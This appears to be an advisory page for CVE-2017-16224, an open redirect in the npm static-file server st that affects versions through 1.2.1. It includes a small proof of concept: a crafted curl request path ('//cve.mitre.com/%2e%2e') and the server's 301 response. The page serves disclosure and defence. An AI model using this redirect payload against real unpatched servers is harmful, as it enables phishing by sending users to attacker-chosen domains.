Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTcyZmctanFoeC1jNjhw
Open Redirect in st
st is a module for serving static files.
An attacker is able to craft a request that results in an HTTP 301
(redirect) to an entirely different domain.
A request for: http://some.server.com//nodesecurity.org/%2e%2e
would result in a 301 to //nodesecurity.org/%2e%2e
which most browsers treat as a proper redirect as //
is translated into the current schema being used.
Mitigating factor:
In order for this to work, st
must be serving from the root of a server (/
) rather than the typical sub directory (/static/
) and the redirect URL will end with some form of URL encoded ..
("%2e%2e", "%2e.", ".%2e").
Code example (provided by Xin Gao):
[example.js]
var st = require('st')
var http = require('http')
http.createServer(st(process.cwd())).listen(1337)
$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e
* Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 1337 (#0)
> GET //cve.mitre.com/%2e%2e HTTP/1.1
> Host: localhost:1337
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< cache-control: public, max-age=600
< last-modified: Fri, 13 Oct 2017 22:56:33 GMT
< etag: "16777220-46488904-1507935393000"
< location: //cve.mitre.com/%2e%2e/
< Date: Fri, 13 Oct 2017 22:56:41 GMT
< Connection: keep-alive
< Content-Length: 30
<
* Connection #0 to host localhost left intact
Recommendation
Update to version 1.2.2 or later.
Permalink: https://github.com/advisories/GHSA-72fg-jqhx-c68pJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTcyZmctanFoeC1jNjhw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 6 years ago
Updated: over 1 year ago
CVSS Score: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS Percentage: 0.00187
EPSS Percentile: 0.56146
Identifiers: GHSA-72fg-jqhx-c68p, CVE-2017-16224
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16224
- https://github.com/advisories/GHSA-72fg-jqhx-c68p
- https://www.npmjs.com/advisories/547
Affected Packages
npm:st
Dependent packages: 501Dependent repositories: 62,960
Downloads: 571,475 last month
Affected Version Ranges: <= 1.2.1
Fixed in: 1.2.2
All affected versions: 0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.0.10, 0.0.11, 0.0.12, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.3.0, 0.3.1, 0.3.2, 0.4.0, 0.4.1, 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4, 0.5.5, 1.0.0, 1.1.0, 1.2.0, 1.2.1
All unaffected versions: 1.2.2, 2.0.0, 3.0.0, 3.0.1